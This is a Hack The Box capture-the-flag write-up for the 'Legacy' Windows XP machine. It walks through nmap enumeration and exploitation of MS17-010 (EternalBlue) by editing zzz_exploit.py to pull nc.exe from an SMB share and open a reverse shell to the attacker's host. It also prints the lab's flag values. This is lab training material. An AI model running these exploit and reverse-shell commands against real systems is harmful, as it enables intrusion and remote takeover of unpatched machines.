Legacy

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.4 -oN allPorts

• -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

• --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

• -p- scanning the entire port range, from 1 to 65535.

• -T5 insane mode, it is the fastest mode of the nmap time template.

• -Pn assume the host is online.

• -n scan without reverse DNS resolution.

• -oN save the scan result into a file, in this case the allports file.

 # Nmap 7.92 scan initiated Wed May 18 20:36:05 2022 as: nmap -sS -p- --min-rate 5000 -n -Pn -oN allPorts 10.10.10.4
Nmap scan report for 10.10.10.4
Host is up (0.083s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE  SERVICE
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
3389/tcp closed ms-wbt-server

# Nmap done at Wed May 18 20:36:32 2022 -- 1 IP address (1 host up) scanned in 26.76 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p139,445,3389 10.10.10.4 -oN targeted

• -sC performs the scan using the default set of scripts.

• -sV enables version detection.

• -oN save the scan result into file, in this case the targeted file.

(# Nmap 7.92 scan initiated Wed May 18 20:14:28 2022 as: nmap -sCV -p139,445,3389 -Pn -oN targeted 10.10.10.4
Nmap scan report for 10.10.10.4
Host is up (0.037s latency).

PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 5d00h27m41s, deviation: 2h07m16s, median: 4d22h57m41s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:bf:97 (VMware)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2022-05-23T23:12:18+03:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 18 20:15:16 2022 -- 1 IP address (1 host up) scanned in 48.13 seconds

The machine has the Windows XP operative system, and the SMB service open. Let's try to enumerate the SMB service a bit more with nmap by applying a series of scripts from the vuln and safe categories.

nmap --script "vuln and safe" -p445 -oN smbScan 10.10.10.4

• --script Runs a script scan script categories.

• -p scan the specific port.

• -oN save the scan result into file, in this case the smbScan file.

Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-18 20:51 CEST
Nmap scan report for 10.10.10.4
Host is up (0.037s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Nmap done: 1 IP address (1 host up) scanned in 16.53 seconds

It looks like the machine is vulnerable to the EternalBlue (MS17-010) exploit.

EternalBlue allows remote attackers to execute arbitrary code on a target system by sending specially crafted messages to the SMBv1 server.

Exploitation

Let's clone the following GitHub repository, which will allow us to exploit the EternalBlue exploit.

git clone https://github.com/worawit/MS17-010

First, we'll have to check it the machine is really vulnerable to the EternalBlue exploit. Execute the checker.py script with with Python2.

python2 MS17-010/checker.py 10.10.10.4

Target OS: Windows 5.1
The target is not patched

=== Testing named pipes ===
spoolss: Ok (32 bit)
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: Ok (32 bit)

The machine is vulnerable to the EternalBlue exploit through various pipe names. Now let's edit the zzz_exploit.py script and find for the cmd word, and change the smb_pwn function, so it will send us a reverse shell.

def smb_pwn(conn, arch):
	smbConn = conn.get_smbconnection()
	
#	print('creating file c:\\pwned.txt on the target')
#	tid2 = smbConn.connectTree('C$')
#	fid2 = smbConn.createFile(tid2, '/pwned.txt')
#	smbConn.closeFile(tid2, fid2)
#	smbConn.disconnectTree(tid2)
	
	#smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
	service_exec(conn, r'cmd /c \\10.10.14.2\smbFolder\nc.exe -e cmd 10.10.14.2 4444')
	# Note: there are many methods to get shell over SMB admin session
	# a simple method to get shell (but easily to be detected by AV) is
	# executing binary generated by "msfvenom -f exe-service ..."

The command will grab the nc.exe from a shared folder to send us the reverse shell. So let's set an SMB server with impacket on the folder in which we have the nc.exe binary.

ls -l

-rw-r--r--  1 root    root      28160 Feb 15 19:35 nc.exe

impacket-smbserver smbFolder $(pwd) -smb2support

Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Before executing the script, let's set a netcat listener on port 4444.

rlwrap nc -lvnp 4444

• -l listen mode.

• -v verbose mode.

• -n numeric-only IP, no DNS resolution.

• -p specify the port to listen on.

Finally, if we execute the zzz_exploit.py script indicating the IP address and the samr pipe name, it will grab the nc.exe binary from our shared folder to send us a reverse shell, and then all we have to do is reap the harvest and take both the user and the root flag.

python2 MS17-010/zzz_exploit.py 10.10.10.4 spoolss

listening on [any] 4444 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.4] 1036
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

type "\Documents and Settings\john\Desktop\user.txt"
e69af0e4f443de7e36876fda4ec7644f

type "\Documents and Settings\administrator\Desktop\root.txt"
993442d258b0e0ec917cae9e695d5713